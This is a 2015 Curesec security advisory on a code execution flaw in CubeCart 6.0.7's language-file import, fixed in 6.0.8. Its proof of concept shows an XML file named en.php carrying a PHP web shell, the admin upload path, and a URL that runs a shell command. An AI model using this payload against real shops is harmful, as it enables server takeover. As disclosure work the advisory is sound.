CubeCart 6.0.7: Code Execution

Date: 2015-10-07 16:01:20

Security Advisory – Curesec Research Team

1. Introduction

Affected Product:	CubeCart 6.0.7
Fixed in:	6.0.8
Fixed Version Link:	https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip
Vendor Contact:	sales@cubecart.com
Vulnerability Type:	Code Execution
Remote Exploitable:	Yes
Reported to vendor:	09/07/2015
Disclosed to public:	10/07/2015
Release mode:	Coordinated release
CVE:	n/a
Credits	Tim Coen of Curesec GmbH

2. Vulnerability Description

When importing a language from a language file, it is only checked that the file contains valid XML, but the original extension of the file is kept, which makes it possible to gain code execution by uploading a file containing PHP code.

Please note that admin credentials are required.

3. Proof of Concept

Create a language file with valid XML and a file name like en.php with PHP code inside:

<language version="2.0"> <info> <title> <![CDATA[My Language (UK)]]> </title> <code>My <?php passthru($_GET['x']);?>Language</code> <character_set>utf-8</character_set> <version>1.0.0</version> <minVersion>5.0.0a</minVersion> <maxVersion>5.1.*</maxVersion> <default_currency>GBP</default_currency> <text-direction>ltr</text-direction> <override/> </info> <translation> <group name="address"> <string name="state"> <![CDATA[County]]></string> </group> </translation> </language>

Upload the file here: http://localhost/ecommerce/CubeCart-6.0.6/admin.php?_g=settings&node=language#lang_import

And visit it to execute the code: http://localhost/ecommerce/CubeCart-6.0.6/language/en.php?x=ls%20-alF

4. Solution

To mitigate this issue please upgrade at least to version 6.0.8:

https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip

Please note that a newer version might already be available.

5. Report Timeline

09/07/2015	Informed Vendor about Issue
10/05/2015	Vendor releases fix
10/07/2015	Disclosed to public